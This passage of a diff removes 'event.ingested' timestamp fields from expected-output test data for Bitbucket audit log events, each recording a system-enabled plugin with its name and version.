enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-web\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-web\"}]}", "type": "info", "kind": "event" @@ -4563,7 +4489,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867754631Z", "original": "{\"timestamp\":\"2021-11-27T17:29:32.073Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-velocity-helper\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-velocity-helper\"}]}", "type": "info", "kind": "event" @@ -4617,7 +4542,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867755598Z", "original": "{\"timestamp\":\"2021-11-27T17:29:32.072Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-user-erasure\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-user-erasure\"}]}", "type": "info", "kind": "event" @@ -4671,7 +4595,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867756570Z", "original": "{\"timestamp\":\"2021-11-27T17:29:32Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-upm-accessor\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-upm-accessor\"}]}", "type": "info", "kind": "event" @@ -4725,7 +4648,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867757577Z", "original": "{\"timestamp\":\"2021-11-27T17:29:31.999Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-tag\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-tag\"}]}", "type": "info", "kind": "event" @@ -4779,7 +4701,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867758521Z", "original": "{\"timestamp\":\"2021-11-27T17:29:31.988Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-suggestions\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-suggestions\"}]}", "type": "info", "kind": "event" @@ -4833,7 +4754,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867759559Z", "original": "{\"timestamp\":\"2021-11-27T17:29:31.723Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-soy-functions\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-soy-functions\"}]}", "type": "info", "kind": "event" @@ -4887,7 +4807,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867760598Z", "original": "{\"timestamp\":\"2021-11-27T17:29:24.643Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-sourcetree\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-sourcetree\"}]}", "type": "info", "kind": "event" @@ -4941,7 +4860,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867761572Z", "original": "{\"timestamp\":\"2021-11-27T17:29:24.638Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-server-web-fragments\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-server-web-fragments\"}]}", "type": "info", "kind": "event" @@ -4995,7 +4913,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867762484Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.479Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-search\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-search\"}]}", "type": "info", "kind": "event" @@ -5049,7 +4966,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867763462Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.434Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-sal\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-sal\"}]}", "type": "info", "kind": "event" @@ -5103,7 +5019,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867764417Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.432Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-rest-ui\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-rest-ui\"}]}", "type": "info", "kind": "event" @@ -5157,7 +5072,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867765352Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.422Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-repository-shortcuts\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-repository-shortcuts\"}]}", "type": "info", "kind": "event" @@ -5211,7 +5125,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867766309Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.406Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-repository-management\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-repository-management\"}]}", "type": "info", "kind": "event" @@ -5265,7 +5178,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867767310Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.343Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-repository-hooks\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-repository-hooks\"}]}", "type": "info", "kind": "event" @@ -5319,7 +5231,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867768246Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.039Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-ref-metadata\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-ref-metadata\"}]}", "type": "info", "kind": "event" @@ -5373,7 +5284,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867769224Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.847Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-rate-limit\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-rate-limit\"}]}", "type": "info", "kind": "event" @@ -5427,7 +5337,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867770173Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.726Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-pull-request-properties\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-pull-request-properties\"}]}", "type": "info", "kind": "event" @@ -5481,7 +5390,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867771138Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.723Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-pull-request-cleanup\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-pull-request-cleanup\"}]}", "type": "info", "kind": "event" @@ -5535,7 +5443,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867772043Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.706Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-policies\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-policies\"}]}", "type": "info", "kind": "event" @@ -5589,7 +5496,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867773251Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.681Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-plugin-information-provider\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-plugin-information-provider\"}]}", "type": "info", "kind": "event" @@ -5643,7 +5549,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867774233Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.680Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-page-data\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-page-data\"}]}", "type": "info", "kind": "event" @@ -5697,7 +5602,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867775125Z", "original": "{\"timestamp\":\"2021-11-27T17:29:21.575Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-notification\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-notification\"}]}", "type": "info", "kind": "event" @@ -5751,7 +5655,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867776058Z", "original": "{\"timestamp\":\"2021-11-27T17:29:21.522Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-nav-links\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-nav-links\"}]}", "type": "info", "kind": "event" @@ -5805,7 +5708,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867776989Z", "original": "{\"timestamp\":\"2021-11-27T17:29:21.519Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-mirroring-upstream\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-mirroring-upstream\"}]}", "type": "info", "kind": "event" @@ -5859,7 +5761,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867778089Z", "original": "{\"timestamp\":\"2021-11-27T17:29:21.497Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-connect-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-connect-plugin\"}]}", "type": "info", "kind": "event" @@ -5913,7 +5814,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867779091Z", "original": "{\"timestamp\":\"2021-11-27T17:29:21.330Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.upm.atlassian-universal-plugin-manager-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.2.10\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.upm.atlassian-universal-plugin-manager-plugin\"}]}", "type": "info", "kind": "event" @@ -5967,7 +5867,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867780079Z", "original": "{\"timestamp\":\"2021-11-27T17:29:20.129Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin 